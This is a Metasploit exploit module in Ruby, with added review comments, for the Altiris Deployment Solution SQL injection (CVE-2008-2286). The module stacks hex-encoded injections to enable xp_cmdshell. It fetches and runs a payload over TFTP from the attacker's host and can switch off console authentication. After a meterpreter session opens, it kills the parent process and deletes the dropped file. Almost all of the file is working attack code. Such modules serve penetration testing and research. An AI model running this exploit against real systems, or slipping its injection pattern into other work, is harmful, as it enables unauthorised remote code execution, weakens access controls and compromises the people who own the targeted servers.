##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Exploit::Remote
  # Exploit module for the Symantec Altiris Deployment Solution SQL injection
  # (CVE-2008-2286, see 'References' below). Per the 'Description', the
  # unsanitized field is a numeric value in an "UpdateComputer" notification
  # handled by axengine.exe; this module delivers its payload by chaining
  # several injections and a CmdStager in :tftp flavor (see #exploit).
  Rank = NormalRanking

  # CmdStager drives #execute_command once per staged command; Tcp provides
  # connect/sock/disconnect used by #send_update_computer.
  include Msf::Exploit::CmdStager
  include Msf::Exploit::Remote::Tcp

  # Registers module metadata and the module-specific options.
  #
  # @param info [Hash] metadata merged by update_info
  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'Symantec Altiris DS SQL Injection',
        'Description' => %q{
          This module exploits a SQL injection flaw in Symantec Altiris Deployment Solution 6.8
          to 6.9.164. The vulnerability exists on axengine.exe which fails to adequately sanitize
          numeric input fields in "UpdateComputer" notification Requests. In order to spawn a shell,
          several SQL injections are required in close succession, first to enable xp_cmdshell, then
          retrieve the payload via TFTP and finally execute it. The module also has the capability
          to disable or enable local application authentication. In order to work the target system
          must have a tftp client available.
        },
        'Author' => [
          'Brett Moore', # Vulnerability discovery
          '3v0lver' # Metasploit module
        ],
        'License' => MSF_LICENSE,
        'References' => [
          [ 'CVE', '2008-2286' ],
          [ 'OSVDB', '45313' ],
          [ 'BID', '29198'],
          [ 'URL', 'http://www.zerodayinitiative.com/advisories/ZDI-08-024' ]
        ],
        'DefaultOptions' => {
          'EXITFUNC' => 'process',
        },
        'Targets' => [
          [
            'Windows 2003 (with tftp client available)',
            {
              'Arch' => ARCH_X86,
              'Platform' => 'win'
            }
          ]
        ],
        'Privileged' => true,
        'Platform' => 'win',
        'DisclosureDate' => '2008-05-15',
        'DefaultTarget' => 0,
        'Compat' => {
          'Meterpreter' => {
            # Every command listed here is used by #on_new_session for cleanup.
            'Commands' => %w[
              stdapi_fs_delete_file
              stdapi_sys_config_getenv
              stdapi_sys_process_attach
              stdapi_sys_process_get_processes
              stdapi_sys_process_kill
            ]
          }
        },
        'Notes' => {
          'Reliability' => UNKNOWN_RELIABILITY,
          'Stability' => UNKNOWN_STABILITY,
          'SideEffects' => UNKNOWN_SIDE_EFFECTS
        }
      )
    )

    # The three OptBool values are copied into instance variables by #exploit
    # and consumed (then cleared) by #execute_command on its first call.
    register_options(
      [
        Opt::RPORT(402),
        OptBool.new('XP_CMDSHELL', [ true, "Enable xp_cmdshell prior to exploit", true]),
        OptBool.new('DISABLE_SECURITY', [ true, "Exploit SQLi to execute wc_upd_disable_security and disable Console Authentication", false ]),
        OptBool.new('ENABLE_SECURITY', [ true, "Enable Local Deployment Console Authentication", false ])
      ]
    )
    # The stager flavor is fixed to :tftp in #exploit, so the generic
    # CmdStager selectors would be misleading if left visible.
    deregister_options('CMDSTAGER::DECODER', 'CMDSTAGER::FLAVOR')

    # NOTE(review): presumably enables the post-session cleanup path
    # implemented in #on_new_session -- confirm against the mixin.
    self.needs_cleanup = true
  end

  # CmdStager callback: translates one staged command into one or more
  # UpdateComputer notifications carrying a hex-encoded SQL fragment each.
  #
  # The one-shot setup fragments (sp_configure for xp_cmdshell, the
  # wc_upd_* security toggles) are emitted only on the first call; the
  # corresponding instance variable is cleared immediately after so later
  # stager calls send only the command itself.
  #
  # @param cmd [String, nil] command from the stager; skipped when nil
  # @param opts [Hash] unused here, accepted for the CmdStager contract
  # @return [Array] the iterated inject list (callers do not use the value)
  def execute_command(cmd, opts = {})
    inject = []

    if @xp_shell_enable
      # NOTE(review): the "#{...}" wrapper around Rex::Text.to_hex is redundant
      # -- to_hex already returns a String -- same on the three lines below.
      inject += [
        "#{Rex::Text.to_hex("sp_configure \"show advanced options\", 1; reconfigure", '')}",
        "#{Rex::Text.to_hex("sp_configure \"xp_cmdshell\", 1; reconfigure", '')}",
      ]
      @xp_shell_enable = false
    end

    if @wc_disable_security
      inject += ["#{Rex::Text.to_hex("wc_upd_disable_security", '')}"]
      @wc_disable_security = false
    end

    if @wc_enable_security
      inject += ["#{Rex::Text.to_hex("wc_upd_enable_security", '')}"]
      @wc_enable_security = false
    end

    # Style: `unless cmd.nil?` is the idiomatic form of `if cmd != nil`.
    inject += ["#{Rex::Text.to_hex("master.dbo.xp_cmdshell \'cd %TEMP% && cmd.exe /c #{cmd}\'", '')}"] if cmd != nil

    # One notification per fragment, in list order; the fragment rides in the
    # Processor-Speed field after a literal numeric prefix. Responses are
    # discarded here, so a failed statement is not detected at this layer.
    # Detection note: every request carries the fixed
    # "declare @querya VARCHAR(255)" / "exec(@querya)" text in that field.
    inject.each do |sqli|
      send_update_computer("2659, null, null;declare @querya VARCHAR(255);select @querya = 0x#{sqli};exec(@querya);--")
    end
  end

  # Sends a single UpdateComputer notification and returns the raw reply.
  #
  # All fields except Processor-Speed are fixed literals (note the static
  # IP-Address, MAC-Address and Name values -- they are identical in every
  # request this module sends, which is useful for detection). The string
  # ends with a NUL byte before the closing delimiter.
  #
  # @param processor_speed [String] value placed verbatim into Processor-Speed
  # @return [String, nil] whatever sock.get_once returns; presumably nil on
  #   no data -- #check treats a falsy value as unknown
  def send_update_computer(processor_speed)
    notification = %Q|Request=UpdateComputer
OS-Bit=32
CPU-Arch=x86
IP-Address=192.168.20.107
MAC-Address=005056C000AB
Name=Remove_test
OS=Windows XP
Version=2.6-38 (32-Bit)
LoggedIn=Yes
Boot-Env=Automation
Platform=Linux
Agent-Settings=Same
Sys-Info-TimeZoneBias=0
Processor=Genuine Intel Intel(R) Core(TM) i7 CPU M 620 @ 2.67GHz
Processor-Speed=#{processor_speed}
\x00
|

    # NOTE(review): no ensure around disconnect; if sock.put or get_once
    # raises, the socket is left to the mixin's own cleanup -- confirm.
    connect
    sock.put(notification)
    response = sock.get_once()
    disconnect

    return response
  end

  # Version-based vulnerability check using a benign UpdateComputer request.
  #
  # @return [Exploit::CheckCode] Unknown when no parsable reply arrives,
  #   Appears for the version ranges below, Safe otherwise
  def check
    res = send_update_computer("2659")

    # Both regexes must match; $1 below refers to the DSVersion capture.
    # NOTE(review): `(.*)` stops at "\n" only, so on a CRLF reply the capture
    # would keep a trailing "\r" and the version regex below would not match.
    unless res and res =~ /Result=Success/ and res =~ /DSVersion=(.*)/
      return Exploit::CheckCode::Unknown
    end

    version = $1

    # NOTE(review): ^ and $ anchor per line, not per string; \A and \z would
    # anchor the whole captured value. Captures: $1 = minor, $2 = build.
    unless version =~ /^6\.(\d+)\.(\d+)$/
      return Exploit::CheckCode::Safe
    end

    vprint_status "#{rhost}:#{rport} - Altiris DS Version '#{version}'"

    minor = $1.to_i
    build = $2.to_i

    if minor == 8
      # NOTE(review): 206, 282 and 378 are all < 390, so the first branch is
      # subsumed by the elsif; both return Appears. Kept for readability only.
      if build == 206 || build == 282 || build == 378
        return Exploit::CheckCode::Appears
      elsif build < 390
        return Exploit::CheckCode::Appears
      end
    elsif minor == 9 and build < 176
      # The existence of versions matching this profile is a possibility... none were observed in the wild though
      # as such, we're basing confidence off of Symantec's vulnerability bulletin.
      return Exploit::CheckCode::Appears
    end

    return Exploit::CheckCode::Safe
  end

  # Entry point: snapshots the option flags for #execute_command and hands
  # delivery to the CmdStager with the :tftp flavor.
  def exploit
    @wc_disable_security = datastore['DISABLE_SECURITY']
    @wc_enable_security = datastore['ENABLE_SECURITY']
    @xp_shell_enable = datastore['XP_CMDSHELL']

    # CmdStagerVBS was tested here as well, however delivery took roughly
    # 30 minutes and required sending almost 350 notification messages.
    # size constraint requirement for SQLi is: linemax => 393
    # A wildcard SRVHOST is not a reachable address for the target, so the
    # local source address is substituted in that case.
    tftphost = (datastore['SRVHOST'] == '0.0.0.0') ? Rex::Socket.source_address : datastore['SRVHOST']
    execute_cmdstager({ delay: 1.5, tftphost: tftphost, temp: '%TEMP%\\', flavor: :tftp })
  end

  # Session hook: removes the dropped payload executable from %TEMP%.
  # Only meterpreter sessions are handled; other session types get a
  # manual-cleanup notice.
  #
  # @param client [Msf::Session] the newly established session
  def on_new_session(client)
    # Style: `return unless stager_instance.payload_exe` is the idiomatic form.
    return if not stager_instance.payload_exe

    # can't scrub dropped payload while the process is still active so...
    # iterate through process list, find our process and the associated
    # parent process ID, Kill the parent.
    # This module doesn't use FileDropper because of timing issues when
    # using migrate -f and FileDropper. On the other hand PrependMigrate
    # has been avoided because of older issues with reverse_https payload

    unless client.type == "meterpreter"
      print_error("Automatic cleanup only available with meterpreter, please delete #{stager_instance.payload_exe} manually")
      return
    end

    client.core.use("stdapi") unless client.ext.aliases.include?("stdapi")
    # migrate
    print_status("Migrating ...")
    client.console.run_single("run migrate -f")
    # kill the parent process so the payload can hopefully be dropped
    # NOTE(review): client.sys.process.open.pid is re-evaluated on every
    # iteration and `proc` shadows Kernel#proc; hoisting the pid into a local
    # named e.g. `own_pid` before the loop would avoid both.
    print_status("Kill parent process ...")
    client.sys.process.get_processes().each do |proc|
      if proc['pid'] == client.sys.process.open.pid
        client.sys.process.kill(proc['ppid'])
      end
    end

    # Clear the read-only attribute first, then delete. Neither call is
    # rescued, so a failure here propagates to the framework.
    win_temp = client.sys.config.getenv('TEMP')
    win_file = "#{win_temp}\\#{stager_instance.payload_exe}"
    print_status("Attempting to delete #{win_file} ...")
    client.shell_command_token(%Q|attrib.exe -r #{win_file}|)
    client.fs.file.rm(win_file)
    print_good("Deleted #{win_file}")
  end
end